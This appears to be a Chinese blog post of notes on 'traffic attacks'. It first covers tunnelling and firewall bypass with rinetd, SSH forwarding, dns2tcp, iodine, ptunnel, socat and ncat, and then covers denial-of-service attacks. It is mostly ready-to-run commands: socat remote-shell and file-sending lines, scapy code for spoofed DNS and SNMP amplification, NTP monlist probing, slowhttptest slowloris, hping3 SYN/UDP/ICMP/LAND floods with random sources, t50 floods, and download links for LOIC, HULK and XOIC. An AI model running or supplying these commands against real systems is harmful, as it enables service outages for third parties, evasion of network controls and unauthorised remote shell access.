流量攻击

        Rinetd重定向
1.    安装rinetd:apt-get install rinetd
2.    配置:/etc/rinetd.conf文件中输入bindadd bindport connectadd connectport4个参数即:侦听主机ip,侦听端口,转发主机,转发端口
3.    运行:rinetd:
a)    查看运行进程:ps aux | grep rinetd,
b)    杀掉进程:pkill rinetd,
c)    查看端口:netstat –pantu | grep :53.
SSH本地端口转发
1. 修改配置文件,可使用root账号,更改/etc/ssh/sshd_config文件。
     –PermitRootLogin yes
 – Port 53 
– PasswordAuthentication yes
2.本地 启动SSH侦听:service ssh start,查看53端口:netstat –pantu | grep :53
▪ ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<sshserver> -p <ssh server port>
▪ ssh -fCNg -L <listen port>:localhost:<remote port> user@<sshserver> -p <ssh port>
        SSH远程端口转发
1.    远程服务器开启SSH,开启侦听:
a)     ▪ ssh -fNg -R <listen port>:<remote ip>:<remote port> user@<SSH server> -p
<ssh server port>
协议隧道(穿透防火墙)
1.    dns2tcpd隧道,修改服务端配置文件:/etc/dns2tcpd.conf
Listen  = 0.0.0.0 ,                                                                            port = 53 ,                                                                                 user = nobody,                                                                                  chroot = /tmp ,                                                                                   key = password123 ,                                         domain=test.lab.com,resources = ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1082,https:127.0.0.1:8087,http:127.0.0.1:3128
2.    服务器启动命令:dns2tcpd –F –d 1 –f /etc/dns2tcpd.conf 
3.    客户端通过使用不同协议连接服务器如SSH连接命令:                                 dns2tcpc -c -k pass -d 1 -l 2222 -r ssh -z test.lab.com                                            会被服务端dns2tcpd.conf配置文件中配置的resources重定向到服务器指定的22端口转发。
4.    iodine隧道:
a)    方法一:
i.    创建服务端隧道网卡:iodined –f –c 10.0.0.1 test.lab.com
ii.    客户端连接隧道:iodine –f test.lab.com
iii.    使用ping 10.0.0.1是否通过防火墙建立连接。
iv.    使用ssh连接:ssh -CfNg -D 7001 root@10.0.0.1
b)    方法二:
i.    服务端安装tap网卡驱动:        https://openvpn.net/index.php/open-source/downloads.html
ii.    Widows客户端:                                                                             – http://code.kryo.se/iodine/                                                                    – iodine -f test.lab.com
5.    Ncat功能:
a)    代理:ncat -l 8080 --proxy-type http --proxy-auth user:pass
b)    连接broker方式:                                    服务端:ncat -l 333 –broker                             客户端:ncat 1.1.1.1 --sh-exec "echo `pwd`“
c)    文件传输:ncat --send-only 1.1.1.1 333 < inputfile
6.    Socat功能:
a)    远程shell获取:                                    服务端: socat tcp-l:23 exec:sh,pty,stderr                    客户端 连接端口获取shell:Socat - tcp:1.1.1.1:23
b)    远程执行命令:
i.    服务器:socat - udp-l:2001
ii.    客户端:echo “`id`” | socat - udp4-datagram:1.1.1.1:2001
c)    端口转发:socat tcp4-listen:22,fork tcp4:1.1.1.1:22
d)    连接端口:Socat - tcp:1.1.1.1:80
e)    侦听端口:socat - tcp4-listen:22 / socat - tcp-l:333
f)    发送文件:cat 1.txt | socat - tcp4:1.1.1.1:333
g)    接受文件:socat tcp4-listen:333 open:2.txt,creat,append
h)    Udp全端口任意内容发包:                               命令:for PORT in {1..65535}; do echo “aaaaa" | socat - UDP4-DATAGRAM: 1.1.1.1:$PORT; sleep .1; done
命令:echo “’id’” |socat – udp-datagram:192.168.0.110:2000
i)    二进制编辑器:                                       echo -e "\0\14\0\0\c" | socat -u - file:/usr/bin/ squid.exe,seek,seek=0x00074420
j)    简单的web服务器:                                                                               socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:"echo -e \"\\ \"HTTP/1.0 200 OK\\\nDocumentType: text/plain\\\n\\\ndate: \$\(date\)\\ \nserver:\$SOCAT_SOCKADDR:\$SOCAT_SOCKPORT\\\nclient: \ $SOCAT_PEERADDR:\$SOCAT_PEERPORT\\\n\\\"\"; cat; echo -e \"\\\"\\\n\ \\"\""
7.    Ptunnle命令,通过ping实现隧道:
a)    服务器:ptunnel -x 1234
b)    客户端:sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234
c)    嵌套SSH隧道:ssh -CNfg -D 7000 root@127.0.0.1 -p 2222
8.    Proxytunnle命令:    
方法一:                                            1.内网安装squid3代理、proxytunnle:                           vi /etc/squid3/squid.conf                                     /^http_port                                         /^http_access                                        /^ac                                        2. 创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -d 192.168.1.1:80
方法二:    
1.    外网安装squid3代理服务器并侦听80端口:
2.    创建隧道:proxytunnle -a 80 -p 127.0.0.1:3128 -r 192.168.1.1:80 -d 192.168.1.1:22
     方法三:
1.    SSH客户端配置自动创建代理:                            vi ~/.ssh/config                             Host 192.168.1.1                                       Hostname 192.168.1.1                     ProtocolKeepAlives 30                                 ProxyCommand /usr/bin/proxytunnel -p 1.1.1.1:3128 -r 192.168.1.1:80 -d %h:%p
9.    sslh端口分配器:vim /etc/default/sslh,                             RUN-yes                                         DAEMON=/usr/sbin/sslh                     DAEMON_OPTS=”--user sslh --listen 1.1.1.10:443 --ssh 127.0.0.1:22 --ssl 1.1.1.11:443 --http 127.0.0.0:80 --pidfile /var/run/sslh/sslh.pid”    
10.    stunnel4服务器:                                        a) 生成证书:openssl req -new –days 365 -nodes -x509 -out /etc/stunnel/  stunnel.pem -keyout /etc/stunnel/stunnel.pem                        b) 创建配置文件:
i.    cert = /etc/stunnel/stunnel.pem 
ii.    ▪ setuid = stunnel4
iii.    ▪ setgid = stunnel4 
iv.    ▪ pid = /var/run/stunnel4/stunnel4.pid 
v.    ▪ [mysqls] 
vi.    ▪ accept = 0.0.0.0:443 
vii.    ▪ connect = 1.1.1.11:3306
c) 自动启动:– /etc/default/stunnel4,▪ ENABLED=1
d) 启动stunnel4服务端:service stunnel4 start    
e)客户端配置(kali自带):
    创建配置文件:/etc/stunnel/stunnel.conf
        ▪ client = yes 
▪ [mysqls] 
▪ accept = 3306 
▪ connect = 192.168.1.11:443
        f)客户端自启:/etc/default/stunnel4,▪ ENABLED=1    
        g)启动客户端:– service stunnel4 stop / start   
            流量攻击DOS
1.    发送ip数据包:
a)    scapy,i=IP(),i.dst=’192.168.0.119’,t=TCP(),t.dport=22,sr1(i/t,verbose=1,timeout=2)
2.    抓包工具wireshark过滤抓包:ip.addr eq 192.168.0.111
3.    DOS攻击:通过发送请求3次握手建立连接,使用iptables规则丢弃对方响应数据包从而达到对方保持短时间持续连接占用资源的效果。            iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
4.    DNS攻击:通过向dns发送数据包访问各种服务器,将数据包响应地址改为目标主机ip。通过响应数据包堵死目标主机。    Scapy构造数据包:            i=IP() i.dst="202.106.0.20" i.src="1.1.1.1" i.display()            u=UDP() u.display() u.dport                         d=DNS() d.rd=1 d.qddount=1 d.display()                 q=DNSQR() q.qname='hp.com' q.qtype=255 q.display()         d.qd=q d.display()                                 r= (i/u/d) r.display() r                         sr1(r) send(r)
5.    Snmp网络协议管理站攻击:通过向snmp服务端发送数据包请求,伪造源地址,snmp响应给攻击目标。到达攻击效果。                        i=IP() i.dst=“1.1.1.1" i.display()                         u=UDP() u.dport=161 u.sport=161                     s=SNMP() s.community= 'public' s.display()             b=SNMPbulk() b.display()                     b.max_repetitions = 100     b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),    SNMPvarbind(oid=ASN1_OID(' 1.3.6.1.2.1.19.1.3'))]         s.PDU=b snmp.display()                             r= (i/u/s) r.display()                             Sr1(r) send(r)
6.    通过时间服务器发动攻击:                                查看开发ntp端口:    nmap -sU -p123 1.1.1.1 / 127.0.0.1            发现漏洞:                                        ntpdc -n -c monlist 1.1.1.1                             ntpq -c rv 1.1.1.1                                 ntpdc -c sysinfo 192.168.20.5                        开启ntp服务(注释掉):/etc/ntp.conf                         restrict -4 default kod nomodify notrap nopeer noquery             restrict -6 default kod nomodify notrap nopeer noquery
7.    应用层dos慢速攻击:最大并发ulimite -n 70000,apt-get install slowhttptest,    http post攻击模式:slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3                slowloris攻击模式:slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http:// 1.1.1.1 -x 24 -p 3
8.    Hping3攻击:可以定制发送任何tcp/ip数据包。                   Syn flood攻击:                                hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1        hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1                hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP FLOOD)ICMP Flood攻击:hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2         UDP Flood攻击:hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2 LAND攻击:hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1           TCPDos攻击:nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1  查公网IP:nping --echo-client "public" echo.nmap.org –udp
9.    Siege(压力测试http/https)工具:模拟多个用户请求。                siege -g http://1.1.1.1/a.php / 1.1.1.1                 siege -i -c 1000                                ▪ /etc/siege/urls.txt(-f参数指定字典)
10.    T50 网络压力测试:                                     t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80              t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
11.    匿名者(拒绝服务攻击组织)发布的DOS工具:LOIC 、 HOIC 、 DDoSer、DDOSIM、GoldenEye                                   其他拒绝服务工具:XOIC                                  攻击任意IP地址的指定端口:                            – git clone git://git.code.sf.net/p/xoic/code xoic-code             – https://xoicdoser.wordpress.com/                        – 三种模式:test、normal、Dos Attack                    – 支持协议:TCP/HTTP/UDP/ICMP                        HULK - Http Unbearable Load King:                        – https://packetstormsecurity.com/files/download/112856/hulk.zip


 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值